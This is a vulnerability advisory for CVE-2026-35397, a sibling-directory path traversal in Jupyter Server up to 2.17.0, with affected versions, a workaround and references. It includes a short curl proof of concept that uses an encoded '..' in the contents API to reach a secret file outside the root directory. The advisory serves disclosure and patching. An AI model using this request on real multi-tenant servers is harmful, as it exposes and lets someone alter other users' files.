CVE-2026-35397

Description

### Summary Jupyter Server <=2.17.0 can access directories sibling to the root directory, if it starts with the root dir's name. ### PoC Minimal: ``` . ├── test/ <- root directory. │ └── test.txt └── testtest/ └── secret.txt <- file to exfiltrate that we should not be able to access via API ``` ```bash HOST="http://localhost:8888" TOKEN="" SIBLING="testtest" TARGET="secret.txt" curl -s -X POST \ "$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints" \ -H "Authorization: token $TOKEN" ``` Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006 ### Impact It is possible for an authenticated user to access content outside the server's `root_dir` in siblings directories sharing the same prefix as the `root_dir`. The attacker can escalate access, reading, writing, and deleting from sibling directories. This can have a tangible impact for deployments using predictable naming scheme with multi-tenant server, for example `user1`, `user2`, `user3`, ..., `user10` etc, as `user1` could access and modify files of all `user10` - `user19` and higher. In a hypothetical system where users can choose a name of their folder, an attacker could choose a single-letter username to gain access to a significant number of sibling directories. ### Workarounds Use folder names that do not overlap. ### Acknowledgments Thank you to @stef41 for providing a useful PoC.

Affected packages (3)

• Debian/jupyter-serverfrom 0
• PyPI/jupyter-serverfrom 0, < 2.18.0
• PyPI/jupyter-serverfrom 0, < 2.18.0

CVSS scores

References (4)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-35397
• ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2026-35397
• PATCHhttps://github.com/jupyter-server/jupyter_server
• WEBhttps://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-5789-5fc7-67v3